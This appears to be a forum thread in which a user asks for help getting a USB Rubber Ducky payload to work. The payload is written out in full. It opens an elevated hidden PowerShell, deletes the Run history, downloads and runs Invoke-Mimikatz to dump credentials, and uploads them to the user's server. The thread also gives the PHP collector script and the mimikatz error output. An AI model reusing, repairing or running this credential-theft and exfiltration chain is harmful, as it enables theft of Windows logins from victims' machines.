mavieprivee

Hello shr00mie, When I run just the line IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o) in a .ps1 file, I obtain a file on my server with this : .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 20 modules * * */ ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106 mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) mimikatz(powershell) # exit Bye! ;-(

In addition to my previous message: I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds With no data ;-(

Hello everyone. For a few days I try to run my first PAYLOAD, following the purchase of the USB Rubber Ducky ... but it doesn't work ;-( In my inject.bin file, I have this: DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)"&exit ENTER NB : I can give the exact url of my hosting by private message I transferred by filezilla on my server both files: im.ps1 (download here : https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 <-- I haven't change) and rx.php In rx.php I have this code : <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> When I insert the USB key, the script executes apparently without error... But no file is created on my hosting ;-( I reread the whole script ... but I do not understand why it doesn't work ;-( Can you help me ? Thank's all ;-) NB : I'm living in FRANCE/Paris and in Normandy (Cabourg). If you go through there, I can offer you a drink ;-)